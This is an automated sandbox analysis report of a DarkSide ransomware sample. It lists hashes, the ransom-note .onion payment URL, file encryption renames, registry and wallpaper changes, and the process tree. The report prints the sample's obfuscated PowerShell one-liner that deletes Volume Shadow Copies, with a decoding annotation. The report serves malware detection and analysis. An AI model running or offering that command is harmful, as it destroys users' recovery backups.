Analysis
max time kernel: 23s
max time network: 17s
platform: windows7_x64
resource: win7v20201028
submitted: 16-01-2021 16:12

Static task: static1
Behavioral task: behavioral1
  Sample: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
  Resource: win10v20201028

General
Target: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
Size: 59KB
MD5: 0ed51a595631e9b4d60896ab5573332f
SHA1: 7ae73b5e1622049380c9b615ce3b7f636665584b
SHA256: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
SHA512: 9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5
Malware Config
Extracted from: C:\\README.d2dea982.TXT
Payment/contact URL: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures

Modifies extensions of user files (4 IoCs)
Ransomware generally changes the extension on encrypted files.
Process: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- File renamed: C:\Users\Admin\Pictures\MoveDisable.raw => C:\Users\Admin\Pictures\MoveDisable.raw.d2dea982
- File opened for modification: C:\Users\Admin\Pictures\MoveDisable.raw.d2dea982
- File renamed: C:\Users\Admin\Pictures\StartEnter.raw => C:\Users\Admin\Pictures\StartEnter.raw.d2dea982
- File opened for modification: C:\Users\Admin\Pictures\StartEnter.raw.d2dea982
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Sets desktop wallpaper using registry (2 TTPs, 2 IoCs)
Process: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\d2dea982.BMP"
- Set value (str): \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\d2dea982.BMP"
Modifies Control Panel (1 IoC)
Process: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Control Panel\Desktop\WallpaperStyle = "10"
Modifies registry class (5 IoCs)
Process: 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.d2dea982
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.d2dea982\ = "d2dea982"
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\d2dea982\DefaultIcon
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\d2dea982
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\d2dea982\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\d2dea982.ico"
Suspicious behavior: EnumeratesProcesses (4 IoCs)
- PID 1212 powershell.exe (2 events)
- PID 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe (2 events)
Suspicious use of AdjustPrivilegeToken (24 IoCs)
PID 1676 243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe, tokens enabled:
- SeIncreaseQuotaPrivilege
- SeSecurityPrivilege
- SeTakeOwnershipPrivilege
- SeLoadDriverPrivilege
- SeSystemProfilePrivilege
- SeSystemtimePrivilege
- SeProfSingleProcessPrivilege
- SeIncBasePriorityPrivilege
- SeCreatePagefilePrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeShutdownPrivilege
- SeDebugPrivilege
- SeSystemEnvironmentPrivilege
- SeRemoteShutdownPrivilege
- SeUndockPrivilege
- SeManageVolumePrivilege
- 33
- 34
- 35
PID 1212 powershell.exe, tokens enabled:
- SeDebugPrivilege
PID 816 vssvc.exe, tokens enabled:
- SeBackupPrivilege
- SeRestorePrivilege
- SeAuditPrivilege
Suspicious use of WriteProcessMemory (4 IoCs)
- PID 1676 (243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe) wrote to memory of PID 1212 (powershell.exe), 4 times
Processes

1. C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.bin.exe"
   - Modifies extensions of user files
   - Sets desktop wallpaper using registry
   - Modifies Control Panel
   - Modifies registry class
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 1)
      Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      (The hex string decodes to the one-liner Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. deletion of Volume Shadow Copies, which accounts for the vssvc.exe activity below and is the reason -ep bypass and the byte-by-byte decoding are worth alerting on.)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

1. C:\Windows\system32\vssvc.exe
   Command line: C:\Windows\system32\vssvc.exe
   - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6